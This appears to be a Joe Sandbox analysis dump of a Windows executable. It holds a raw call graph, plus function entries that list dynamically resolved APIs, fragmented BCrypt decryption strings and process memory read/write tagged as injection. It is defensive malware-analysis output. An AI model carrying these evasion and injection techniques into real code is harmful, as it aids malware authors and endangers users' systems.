__free_lconv_mon 62 API calls 3667->3671 3668->3666 3669->3667 3672 7ff609757e71 3670->3672 3673 7ff609757460 __free_lconv_mon 62 API calls 3670->3673 3671->3670 3674 7ff609757e83 3672->3674 3675 7ff609757460 __free_lconv_mon 62 API calls 3672->3675 3673->3672 3676 7ff609757e95 3674->3676 3677 7ff609757460 __free_lconv_mon 62 API calls 3674->3677 3675->3674 3678 7ff609757460 __free_lconv_mon 62 API calls 3676->3678 3679 7ff609757eaa 3676->3679 3677->3676 3678->3679 3680 7ff609757ebf 3679->3680 3681 7ff609757460 __free_lconv_mon 62 API calls 3679->3681 3680->3682 3683 7ff609757460 __free_lconv_mon 62 API calls 3680->3683 3681->3680 3682->3639 3683->3682 3685 7ff609757d69 3684->3685 3693 7ff609757dca 3684->3693 3686 7ff609757d82 3685->3686 3687 7ff609757460 __free_lconv_mon 62 API calls 3685->3687 3688 7ff609757d94 3686->3688 3689 7ff609757460 __free_lconv_mon 62 API calls 3686->3689 3687->3686 3690 7ff609757da6 3688->3690 3691 7ff609757460 __free_lconv_mon 62 API calls 3688->3691 3689->3688 3692 7ff609757460 __free_lconv_mon 62 API calls 3690->3692 3694 7ff609757db8 3690->3694 3691->3690 3692->3694 3693->3636 3694->3693 3695 7ff609757460 __free_lconv_mon 62 API calls 3694->3695 3695->3693 3697 7ff60975797d 3696->3697 3869 7ff609754fd3 3696->3869 3698 7ff609757460 __free_lconv_mon 62 API calls 3697->3698 3699 7ff60975798e 3698->3699 3700 7ff609757460 __free_lconv_mon 62 API calls 3699->3700 3701 7ff609757997 3700->3701 3702 7ff609757460 __free_lconv_mon 62 API calls 3701->3702 3703 7ff6097579a0 3702->3703 3704 7ff609757460 __free_lconv_mon 62 API calls 3703->3704 3705 7ff6097579a9 3704->3705 3706 7ff609757460 __free_lconv_mon 62 API calls 3705->3706 3707 7ff6097579b2 3706->3707 3708 7ff609757460 __free_lconv_mon 62 API calls 3707->3708 3709 7ff6097579bb 3708->3709 3710 7ff609757460 __free_lconv_mon 62 API calls 3709->3710 3711 7ff6097579c3 3710->3711 3712 7ff609757460 __free_lconv_mon 62 API calls 3711->3712 3713 7ff6097579cc 3712->3713 3714 7ff609757460 __free_lconv_mon 62 API calls 3713->3714 3715 7ff6097579d5 3714->3715 3716 7ff609757460 __free_lconv_mon 62 API calls 3715->3716 3717 7ff6097579de 3716->3717 3718 7ff609757460 __free_lconv_mon 62 API calls 3717->3718 3719 7ff6097579e7 3718->3719 3720 7ff609757460 __free_lconv_mon 62 API calls 3719->3720 3721 7ff6097579f0 3720->3721 3722 7ff609757460 __free_lconv_mon 62 API calls 3721->3722 3723 7ff6097579f9 3722->3723 3724 7ff609757460 __free_lconv_mon 62 API calls 3723->3724 3725 7ff609757a02 3724->3725 3726 7ff609757460 __free_lconv_mon 62 API calls 3725->3726 3727 7ff609757a0b 3726->3727 3728 7ff609757460 __free_lconv_mon 62 API calls 3727->3728 3729 7ff609757a14 3728->3729 3730 7ff609757460 __free_lconv_mon 62 API calls 3729->3730 3731 7ff609757a20 3730->3731 3732 7ff609757460 __free_lconv_mon 62 API calls 3731->3732 3733 7ff609757a2c 3732->3733 3734 7ff609757460 __free_lconv_mon 62 API calls 3733->3734 3735 7ff609757a38 3734->3735 3736 7ff609757460 __free_lconv_mon 62 API calls 3735->3736 3737 7ff609757a44 3736->3737 3738 7ff609757460 __free_lconv_mon 62 API calls 3737->3738 3739 7ff609757a50 3738->3739 3740 7ff609757460 __free_lconv_mon 62 API calls 3739->3740 3741 7ff609757a5c 3740->3741 3742 7ff609757460 __free_lconv_mon 62 API calls 3741->3742 3743 7ff609757a68 3742->3743 3744 7ff609757460 __free_lconv_mon 62 API calls 3743->3744 3745 7ff609757a74 3744->3745 3746 7ff609757460 __free_lconv_mon 62 API calls 3745->3746 3747 7ff609757a80 3746->3747 3748 7ff609757460 __free_lconv_mon 62 API calls 3747->3748 3749 7ff609757a8c 3748->3749 3750 7ff609757460 __free_lconv_mon 62 API calls 3749->3750 3751 7ff609757a98 3750->3751 3752 7ff609757460 __free_lconv_mon 62 API calls 3751->3752 3753 7ff609757aa4 3752->3753 3754 7ff609757460 __free_lconv_mon 62 API calls 3753->3754 3755 7ff609757ab0 3754->3755 3756 7ff609757460 __free_lconv_mon 62 API calls 3755->3756 3757 7ff609757abc 3756->3757 3758 7ff609757460 __free_lconv_mon 62 API calls 3757->3758 3759 7ff609757ac8 3758->3759 3760 7ff609757460 __free_lconv_mon 62 API calls 3759->3760 3761 7ff609757ad4 3760->3761 3762 7ff609757460 __free_lconv_mon 62 API calls 3761->3762 3763 7ff609757ae0 3762->3763 3764 7ff609757460 __free_lconv_mon 62 API calls 3763->3764 3765 7ff609757aec 3764->3765 3766 7ff609757460 __free_lconv_mon 62 API calls 3765->3766 3767 7ff609757af8 3766->3767 3768 7ff609757460 __free_lconv_mon 62 API calls 3767->3768 3769 7ff609757b04 3768->3769 3770 7ff609757460 __free_lconv_mon 62 API calls 3769->3770 3771 7ff609757b10 3770->3771 3772 7ff609757460 __free_lconv_mon 62 API calls 3771->3772 3773 7ff609757b1c 3772->3773 3774 7ff609757460 __free_lconv_mon 62 API calls 3773->3774 3775 7ff609757b28 3774->3775 3776 7ff609757460 __free_lconv_mon 62 API calls 3775->3776 3777 7ff609757b34 3776->3777 3778 7ff609757460 __free_lconv_mon 62 API calls 3777->3778 3779 7ff609757b40 3778->3779 3780 7ff609757460 __free_lconv_mon 62 API calls 3779->3780 3781 7ff609757b4c 3780->3781 3782 7ff609757460 __free_lconv_mon 62 API calls 3781->3782 3783 7ff609757b58 3782->3783 3784 7ff609757460 __free_lconv_mon 62 API calls 3783->3784 3785 7ff609757b64 3784->3785 3786 7ff609757460 __free_lconv_mon 62 API calls 3785->3786 3787 7ff609757b70 3786->3787 3788 7ff609757460 __free_lconv_mon 62 API calls 3787->3788 3789 7ff609757b7c 3788->3789 3790 7ff609757460 __free_lconv_mon 62 API calls 3789->3790 3791 7ff609757b88 3790->3791 3792 7ff609757460 __free_lconv_mon 62 API calls 3791->3792 3793 7ff609757b94 3792->3793 3794 7ff609757460 __free_lconv_mon 62 API calls 3793->3794 3795 7ff609757ba0 3794->3795 3796 7ff609757460 __free_lconv_mon 62 API calls 3795->3796 3797 7ff609757bac 3796->3797 3798 7ff609757460 __free_lconv_mon 62 API calls 3797->3798 3799 7ff609757bb8 3798->3799 3800 7ff609757460 __free_lconv_mon 62 API calls 3799->3800 3801 7ff609757bc4 3800->3801 3802 7ff609757460 __free_lconv_mon 62 API calls 3801->3802 3803 7ff609757bd0 3802->3803 3804 7ff609757460 __free_lconv_mon 62 API calls 3803->3804 3805 7ff609757bdc 3804->3805 3806 7ff609757460 __free_lconv_mon 62 API calls 3805->3806 3807 7ff609757be8 3806->3807 3808 7ff609757460 __free_lconv_mon 62 API calls 3807->3808 3809 7ff609757bf4 3808->3809 3810 7ff609757460 __free_lconv_mon 62 API calls 3809->3810 3811 7ff609757c00 3810->3811 3812 7ff609757460 __free_lconv_mon 62 API calls 3811->3812 3813 7ff609757c0c 3812->3813 3814 7ff609757460 __free_lconv_mon 62 API calls 3813->3814 3815 7ff609757c18 3814->3815 3816 7ff609757460 __free_lconv_mon 62 API calls 3815->3816 3817 7ff609757c24 3816->3817 3818 7ff609757460 __free_lconv_mon 62 API calls 3817->3818 3819 7ff609757c30 3818->3819 3820 7ff609757460 __free_lconv_mon 62 API calls 3819->3820 3821 7ff609757c3c 3820->3821 3822 7ff609757460 __free_lconv_mon 62 API calls 3821->3822 3823 7ff609757c48 3822->3823 3824 7ff609757460 __free_lconv_mon 62 API calls 3823->3824 3825 7ff609757c54 3824->3825 3826 7ff609757460 __free_lconv_mon 62 API calls 3825->3826 3827 7ff609757c60 3826->3827 3828 7ff609757460 __free_lconv_mon 62 API calls 3827->3828 3829 7ff609757c6c 3828->3829 3830 7ff609757460 __free_lconv_mon 62 API calls 3829->3830 3831 7ff609757c78 3830->3831 3832 7ff609757460 __free_lconv_mon 62 API calls 3831->3832 3833 7ff609757c84 3832->3833 3834 7ff609757460 __free_lconv_mon 62 API calls 3833->3834 3835 7ff609757c90 3834->3835 3836 7ff609757460 __free_lconv_mon 62 API calls 3835->3836 3837 7ff609757c9c 3836->3837 3838 7ff609757460 __free_lconv_mon 62 API calls 3837->3838 3839 7ff609757ca8 3838->3839 3840 7ff609757460 __free_lconv_mon 62 API calls 3839->3840 3841 7ff609757cb4 3840->3841 3842 7ff609757460 __free_lconv_mon 62 API calls 3841->3842 3843 7ff609757cc0 3842->3843 3844 7ff609757460 __free_lconv_mon 62 API calls 3843->3844 3845 7ff609757ccc 3844->3845 3846 7ff609757460 __free_lconv_mon 62 API calls 3845->3846 3847 7ff609757cd8 3846->3847 3848 7ff609757460 __free_lconv_mon 62 API calls 3847->3848 3849 7ff609757ce4 3848->3849 3850 7ff609757460 __free_lconv_mon 62 API calls 3849->3850 3851 7ff609757cf0 3850->3851 3852 7ff609757460 __free_lconv_mon 62 API calls 3851->3852 3853 7ff609757cfc 3852->3853 3854 7ff609757460 __free_lconv_mon 62 API calls 3853->3854 3855 7ff609757d08 3854->3855 3856 7ff609757460 __free_lconv_mon 62 API calls 3855->3856 3857 7ff609757d14 3856->3857 3858 7ff609757460 __free_lconv_mon 62 API calls 3857->3858 3859 7ff609757d20 3858->3859 3860 7ff609757460 __free_lconv_mon 62 API calls 3859->3860 3861 7ff609757d2c 3860->3861 3862 7ff609757460 __free_lconv_mon 62 API calls 3861->3862 3863 7ff609757d38 3862->3863 3864 7ff609757460 __free_lconv_mon 62 API calls 3863->3864 3865 7ff609757d44 3864->3865 3866 7ff609757460 __free_lconv_mon 62 API calls 3865->3866 3867 7ff609757d50 3866->3867 3868 7ff609757460 __free_lconv_mon 62 API calls 3867->3868 3868->3869 3869->3642 3871 7ff609752c54 3872 7ff609752ce0 3871->3872 3874 7ff609752c64 3871->3874 3873 7ff609752cda FreeLibrary 3873->3872 3874->3873 3875 7ff609752c93 LocalFree 3874->3875 3876 7ff609752cac LocalFree 3875->3876 3876->3873 3878 7ff60975918e 3881 7ff60975731c LeaveCriticalSection 3878->3881 3882 7ff609752f10 3883 7ff609752f70 3882->3883 3884 7ff609753056 3883->3884 3885 7ff609751380 15 API calls 3883->3885 3886 7ff609752fac 3885->3886 3886->3884 3887 7ff609751170 11 API calls 3886->3887 3888 7ff609752fdb 3887->3888 3888->3884 3889 7ff609751170 11 API calls 3888->3889 3890 7ff60975300e 3889->3890 3890->3884 3894 7ff609753074 3890->3894 3893 7ff609753074 17 API calls 3893->3884 3895 7ff6097530b1 GetModuleHandleW GetProcAddress 3894->3895 3897 7ff6097530fc 3895->3897 3898 7ff609753032 3897->3898 3899 7ff609751170 11 API calls 3897->3899 3898->3884 3898->3893 3900 7ff609753122 3899->3900 3901 7ff609753246 LocalFree 3900->3901 3902 7ff609751170 11 API calls 3900->3902 3901->3898 3903 7ff60975314b 3902->3903 3903->3901 3904 7ff609751170 11 API calls 3903->3904 3905 7ff60975316d 3904->3905 3905->3901 3906 7ff609751170 11 API calls 3905->3906 3907 7ff60975319c 3906->3907 3907->3901 3908 7ff6097531b3 GetModuleHandleW GetProcAddress 3907->3908 3909 7ff6097531e1 3908->3909 3909->3901 3910 7ff609751170 11 API calls 3909->3910 3911 7ff609753207 LocalFree 3910->3911 3911->3901 3913 7ff609752518 3914 7ff60975255a 3913->3914 3929 7ff6097527d0 3913->3929 3915 7ff609752599 RtlInitUnicodeString 3914->3915 3916 7ff609752563 GetModuleHandleW GetProcAddress 3914->3916 3917 7ff60975196c 38 API calls 3915->3917 3918 7ff609752589 3916->3918 3919 7ff609752604 3917->3919 3918->3915 3918->3929 3920 7ff609752632 GetProcAddress 3919->3920 3926 7ff6097526aa 3919->3926 3919->3929 3922 7ff609752679 GetProcAddress 3920->3922 3920->3926 3921 7ff609751380 15 API calls 3923 7ff6097526ff 3921->3923 3924 7ff609752696 3922->3924 3922->3926 3927 7ff60975276f GetModuleHandleW GetProcAddress 3923->3927 3923->3929 3925 7ff609751380 15 API calls 3924->3925 3925->3926 3926->3921 3926->3929 3928 7ff60975279f GetModuleHandleW GetProcAddress 3927->3928 3928->3929 3930 7ff609759223 LeaveCriticalSection 3931 7ff609755ea4 3932 7ff609755fcc 3931->3932 3933 7ff609755ee6 _cinit 3931->3933 3933->3932 3934 7ff609755f8a RtlUnwindEx 3933->3934 3934->3933 3939 7ff609752820 3940 7ff609752839 3939->3940 3941 7ff609752830 LocalFree 3939->3941 3942 7ff609752845 LocalFree 3940->3942 3943 7ff60975284e 3940->3943 3941->3940 3942->3943 3944 7ff60975285a FreeLibrary 3943->3944 3945 7ff609752860 3943->3945 3944->3945 3946 7ff609752868 3947 7ff609751380 15 API calls 3946->3947 3948 7ff6097528cb 3947->3948 3949 7ff60975297f 3948->3949 3950 7ff609751170 11 API calls 3948->3950 3951 7ff6097528f8 3950->3951 3951->3949 3952 7ff609751170 11 API calls 3951->3952 3953 7ff60975292d 3952->3953 3953->3949 3957 7ff609752998 3953->3957 3956 7ff609752998 11 API calls 3956->3949 3958 7ff609751170 11 API calls 3957->3958 3959 7ff6097529da 3958->3959 3960 7ff609751170 11 API calls 3959->3960 3963 7ff609752956 3959->3963 3961 7ff609752a00 3960->3961 3962 7ff609751170 11 API calls 3961->3962 3961->3963 3962->3963 3963->3949 3963->3956 3964 7ff6097552a8 3965 7ff6097553d0 3964->3965 3966 7ff6097552b1 3964->3966 3967 7ff6097552cc 3966->3967 3968 7ff609757460 __free_lconv_mon 62 API calls 3966->3968 3969 7ff6097552da 3967->3969 3970 7ff609757460 __free_lconv_mon 62 API calls 3967->3970 3968->3967 3971 7ff6097552e8 3969->3971 3972 7ff609757460 __free_lconv_mon 62 API calls 3969->3972 3970->3969 3973 7ff6097552f6 3971->3973 3974 7ff609757460 __free_lconv_mon 62 API calls 3971->3974 3972->3971 3975 7ff609755304 3973->3975 3977 7ff609757460 __free_lconv_mon 62 API calls 3973->3977 3974->3973 3976 7ff609755312 3975->3976 3978 7ff609757460 __free_lconv_mon 62 API calls 3975->3978 3979 7ff609755323 3976->3979 3980 7ff609757460 __free_lconv_mon 62 API calls 3976->3980 3977->3975 3978->3976 3981 7ff60975533b 3979->3981 3982 7ff609757460 __free_lconv_mon 62 API calls 3979->3982 3980->3979 3983 7ff60975741c _lock 62 API calls 3981->3983 3982->3981 3987 7ff609755347 3983->3987 3984 7ff609755374 3996 7ff60975731c LeaveCriticalSection 3984->3996 3987->3984 3989 7ff609757460 __free_lconv_mon 62 API calls 3987->3989 3989->3984 4001 7ff609753fee 4002 7ff609754062 4001->4002 4003 7ff60975402e 4001->4003 4007 7ff6097540f4 4002->4007 4014 7ff609753ef8 GetModuleHandleW GetProcAddress 4002->4014 4004 7ff609753da8 15 API calls 4003->4004 4004->4002 4008 7ff609754092 GetModuleHandleW GetProcAddress 4009 7ff6097540ba 4008->4009 4009->4007 4010 7ff609751170 11 API calls 4009->4010 4012 7ff6097540d4 4010->4012 4011 7ff6097540ea LocalFree 4011->4007 4012->4011 4022 7ff609753b74 4012->4022 4015 7ff609753f57 4014->4015 4016 7ff609753fd1 4015->4016 4017 7ff609751170 11 API calls 4015->4017 4016->4007 4016->4008 4021 7ff609753f70 4017->4021 4018 7ff609753fc1 4019 7ff609753fcb LocalFree 4018->4019 4019->4016 4020 7ff609751170 11 API calls 4020->4021 4021->4018 4021->4019 4021->4020 4023 7ff609753bac 4022->4023 4025 7ff609753d86 4023->4025 4058 7ff60975224c 4023->4058 4025->4011 4027 7ff609753bd4 4029 7ff60975224c 13 API calls 4027->4029 4030 7ff609753bed 4029->4030 4031 7ff609753bf9 4030->4031 4032 7ff6097522f0 2 API calls 4030->4032 4033 7ff60975224c 13 API calls 4031->4033 4032->4031 4034 7ff609753c12 4033->4034 4035 7ff609753d59 4034->4035 4040 7ff6097522f0 2 API calls 4034->4040 4036 7ff609753d68 4035->4036 4037 7ff609753d5e LocalFree 4035->4037 4038 7ff609753d6d LocalFree 4036->4038 4039 7ff609753d77 4036->4039 4037->4036 4038->4039 4039->4025 4041 7ff609753d7c LocalFree 4039->4041 4042 7ff609753c37 4040->4042 4041->4025 4042->4035 4068 7ff609753a80 4042->4068 4044 7ff609753c53 4045 7ff609753a80 2 API calls 4044->4045 4046 7ff609753c5e 4045->4046 4047 7ff609753a80 2 API calls 4046->4047 4048 7ff609753c69 4047->4048 4049 7ff609753c8b wsprintfW GetModuleHandleW GetProcAddress 4048->4049 4050 7ff609753c71 StrChrW 4048->4050 4052 7ff609753d2f 4049->4052 4050->4049 4053 7ff609753d3d 4052->4053 4054 7ff609753d34 LocalFree 4052->4054 4055 7ff609753d4b 4053->4055 4056 7ff609753d42 LocalFree 4053->4056 4054->4053 4055->4035 4057 7ff609753d50 LocalFree 4055->4057 4056->4055 4057->4035 4059 7ff60975228a 4058->4059 4063 7ff6097522da 4058->4063 4060 7ff609752290 GetModuleHandleW GetProcAddress 4059->4060 4059->4063 4061 7ff6097522b8 4060->4061 4062 7ff609751170 11 API calls 4061->4062 4061->4063 4062->4063 4063->4027 4064 7ff6097522f0 4063->4064 4065 7ff60975230d IsCharAlphaNumericW 4064->4065 4066 7ff60975231e IsTextUnicode 4064->4066 4065->4066 4067 7ff609752334 4065->4067 4066->4067 4067->4027 4069 7ff609753a94 GetModuleHandleW GetProcAddress 4068->4069 4070 7ff609753abf __initmbctable 4068->4070 4069->4070 4070->4044 4071 7ff6097520f0 RtlEqualUnicodeString 4072 7ff609752123 __initmbctable 4071->4072 4073 7ff609754d70 4074 7ff609754d7d 4073->4074 4075 7ff609754d87 4073->4075 4077 7ff609754b90 4074->4077 4078 7ff609755284 _getptd 62 API calls 4077->4078 4079 7ff609754bb4 4078->4079 4080 7ff6097547cc __initmbctable 62 API calls 4079->4080 4081 7ff609754bbc 4080->4081 4101 7ff609754888 4081->4101 4084 7ff6097574a0 __wsetargv 62 API calls 4085 7ff609754be0 __initmbctable 4084->4085 4100 7ff609754d23 4085->4100 4108 7ff609754918 4085->4108 4088 7ff609754c1b 4090 7ff609754c3f 4088->4090 4094 7ff609757460 __free_lconv_mon 62 API calls 4088->4094 4089 7ff609754d25 4091 7ff609754d3e 4089->4091 4092 7ff609757460 __free_lconv_mon 62 API calls 4089->4092 4089->4100 4095 7ff60975741c _lock 62 API calls 4090->4095 4090->4100 4093 7ff609755798 _errno 62 API calls 4091->4093 4092->4091 4093->4100 4094->4090 4096 7ff609754c6f 4095->4096 4097 7ff609754d12 4096->4097 4099 7ff609757460 __free_lconv_mon 62 API calls 4096->4099 4118 7ff60975731c LeaveCriticalSection 4097->4118 4099->4097 4100->4075 4102 7ff609754130 __initmbctable 62 API calls 4101->4102 4103 7ff60975489c 4102->4103 4104 7ff6097548cd 4103->4104 4105 7ff6097548a8 GetOEMCP 4103->4105 4106 7ff6097548d2 GetACP 4104->4106 4107 7ff6097548b8 4104->4107 4105->4107 4106->4107 4107->4084 4107->4100 4109 7ff609754888 __initmbctable 64 API calls 4108->4109 4110 7ff60975493f 4109->4110 4111 7ff609754947 __initmbctable 4110->4111 4112 7ff609754998 IsValidCodePage 4110->4112 4116 7ff6097549be __initmbctable 4110->4116 4113 7ff6097571f0 malloc 8 API calls 4111->4113 4112->4111 4114 7ff6097549a9 GetCPInfo 4112->4114 4115 7ff609754b79 4113->4115 4114->4111 4114->4116 4115->4088 4115->4089 4116->4116 4119 7ff6097545dc GetCPInfo 4116->4119 4120 7ff609754629 __initmbctable 4119->4120 4121 7ff60975470f 4119->4121 4129 7ff609757154 4120->4129 4123 7ff6097571f0 malloc 8 API calls 4121->4123 4125 7ff6097547b3 4123->4125 4125->4111 4128 7ff609756f5c __initmbctable 68 API calls 4128->4121 4130 7ff609754130 __initmbctable 62 API calls 4129->4130 4131 7ff609757178 4130->4131 4139 7ff609756ff4 4131->4139 4134 7ff609756f5c 4135 7ff609754130 __initmbctable 62 API calls 4134->4135 4136 7ff609756f80 4135->4136 4152 7ff609756c90 4136->4152 4140 7ff609757039 MultiByteToWideChar 4139->4140 4141 7ff609757033 4139->4141 4142 7ff609757062 4140->4142 4150 7ff60975705b 4140->4150 4141->4140 4145 7ff609758cd4 malloc 62 API calls 4142->4145 4149 7ff609757081 __initmbctable 4142->4149 4143 7ff6097571f0 malloc 8 API calls 4144 7ff6097546ab 4143->4144 4144->4134 4145->4149 4146 7ff6097570e3 MultiByteToWideChar 4147 7ff609757119 4146->4147 4148 7ff609757104 GetStringTypeW 4146->4148 4147->4150 4151 7ff609757460 __free_lconv_mon 62 API calls 4147->4151 4148->4147 4149->4146 4149->4150 4150->4143 4151->4150 4155 7ff609756ccf MultiByteToWideChar 4152->4155 4154 7ff609756d37 4157 7ff6097571f0 malloc 8 API calls 4154->4157 4155->4154 4161 7ff609756d3e 4155->4161 4156 7ff609756daf MultiByteToWideChar 4158 7ff609756dd5 LCMapStringW 4156->4158 4159 7ff609756f21 4156->4159 4160 7ff6097546da 4157->4160 4158->4159 4162 7ff609756dff 4158->4162 4159->4154 4165 7ff609757460 __free_lconv_mon 62 API calls 4159->4165 4160->4128 4163 7ff609756d69 __initmbctable 4161->4163 4164 7ff609758cd4 malloc 62 API calls 4161->4164 4166 7ff609756e0a 4162->4166 4169 7ff609756e41 4162->4169 4163->4154 4163->4156 4164->4163 4165->4154 4166->4159 4167 7ff609756e1d LCMapStringW 4166->4167 4167->4159 4168 7ff609756eb3 LCMapStringW 4171 7ff609756ed4 WideCharToMultiByte 4168->4171 4172 7ff609756f10 4168->4172 4170 7ff609758cd4 malloc 62 API calls 4169->4170 4174 7ff609756e5e __initmbctable 4169->4174 4170->4174 4171->4172 4172->4159 4173 7ff609757460 __free_lconv_mon 62 API calls 4172->4173 4173->4159 4174->4159 4174->4168 4176 7ff609759170 4179 7ff6097560a4 4176->4179 4180 7ff609755200 _errno 62 API calls 4179->4180 4181 7ff6097560c2 4180->4181

                                              Executed Functions

                                              Function 00007FF609751864 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 51nativelibrarymemoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: InformationLocalQuerySystem$AddressAllocFreeHandleModuleProc
                                              • String ID: LocalAlloc$kernel32
                                              • API String ID: 3225137318-3502785670
                                              • Opcode ID: 47f930b65d7387621bb699346c0185fc8cbfa8100009a5780717c1746bed8342
                                              • Instruction ID: 1927a401834537f3ed10408c024240f8a3b4ab809437ecf8e27f44434f56ca86
                                              • Opcode Fuzzy Hash: 47f930b65d7387621bb699346c0185fc8cbfa8100009a5780717c1746bed8342
                                              • Instruction Fuzzy Hash: 6E118273B28A5286F7948F15A80462927A2FB88BD5F684135DE0DC3764EFBDE445C304
                                              Function 00007FF60975214C Relevance: 4.6, APIs: 3, Instructions: 79nativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: CurrentProcess$InformationQuery
                                              • String ID:
                                              • API String ID: 4257070689-0
                                              • Opcode ID: bbb3386392f23902eb481ae4201445191efc0b08561d4a2dc4b3b2802b3fa859
                                              • Instruction ID: b04b8e730bfdcf28fe80ebb04e1258cbb87a3ae35a3f83ea4f7123e2f218bc41
                                              • Opcode Fuzzy Hash: bbb3386392f23902eb481ae4201445191efc0b08561d4a2dc4b3b2802b3fa859
                                              • Instruction Fuzzy Hash: A931B037B04B528AEBA48F51E840AAE3766FB04BC8F600035DE1D93754DF78E856C340
                                              Function 00007FF609752A34 Relevance: 49.1, APIs: 11, Strings: 17, Instructions: 98libraryloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: AddressProc$HandleLibraryLoadModule
                                              • String ID: BCryenAlthmPder$BCrynerammeteyBCryenAlthmPder$BCryptCloseAlgorithmProvider$BCryptDecrypt$BCryptDestroyKey$BCryptEncrypt$BCryptGetProperty$BCryptSetProperty$LoadLibraryW$c$der$gori$kernel32$rovi$t$thmP$y
                                              • API String ID: 384173800-2409299874
                                              • Opcode ID: de6fc6558afeec837b3fc645aabfb980b25bcd809969add128eeed8ffce5164f
                                              • Instruction ID: 92922123dd16b456c50545b7363194fa6a05eeeb6f924c4cfd2ce7d7f14df4cd
                                              • Opcode Fuzzy Hash: de6fc6558afeec837b3fc645aabfb980b25bcd809969add128eeed8ffce5164f
                                              • Instruction Fuzzy Hash: EA51E273E19A42CAFB94CF62E8441783BB3BB84785F644139C91C96765EFBCA588C740
                                              Function 00007FF609751170 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 139libraryloaderinjectionCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc$FileMemoryPointerProcess$FreeLocalReadWrite
                                              • String ID: LocalAlloc$ReadFile$WriteFile$kernel32
                                              • API String ID: 1117553398-482538141
                                              • Opcode ID: 7e8b7c9119c57d427c8072a0c333a4a6aaedd0a37966b110f54e2e09aaa1b727
                                              • Instruction ID: 95f15a81dc6352ee56ed3b6a45f63e81bc2d1046058d7d12c7c67b4a0ab542c0
                                              • Opcode Fuzzy Hash: 7e8b7c9119c57d427c8072a0c333a4a6aaedd0a37966b110f54e2e09aaa1b727
                                              • Instruction Fuzzy Hash: CC513D77B18A8282EB949F16E85067D6362FB88BC5BA48135DA4EC7B54DF7CE844C300
                                              Function 00007FF60975196C Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 389libraryloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 51 7ff60975196c-7ff6097519d1 52 7ff6097519d7-7ff6097519d9 51->52 53 7ff609751e78-7ff609751e89 call 7ff60975214c 51->53 54 7ff609751bd8-7ff609751bf3 call 7ff60975214c 52->54 55 7ff6097519df-7ff6097519e1 52->55 61 7ff609751e8b-7ff609751e93 53->61 62 7ff609751ee1-7ff609751eed 53->62 68 7ff609751f6e-7ff609751f83 54->68 72 7ff609751bf9-7ff609751c25 call 7ff609751170 54->72 58 7ff609751b3a-7ff609751b5c call 7ff609751624 55->58 59 7ff6097519e7-7ff6097519e9 55->59 58->68 77 7ff609751b62-7ff609751b66 58->77 63 7ff6097519eb-7ff6097519f0 59->63 64 7ff6097519f5-7ff609751a0a call 7ff609751864 59->64 67 7ff609751ed1-7ff609751edc 61->67 62->68 70 7ff609751eef-7ff609751ef1 62->70 63->68 64->68 80 7ff609751a10-7ff609751a28 64->80 74 7ff609751e95-7ff609751e97 67->74 75 7ff609751ede 67->75 70->68 76 7ff609751ef3-7ff609751f08 call 7ff60975214c 70->76 72->68 85 7ff609751c2b-7ff609751c3e 72->85 74->75 79 7ff609751e99-7ff609751ecd call 7ff609751f84 74->79 75->62 76->68 94 7ff609751f0a-7ff609751f11 76->94 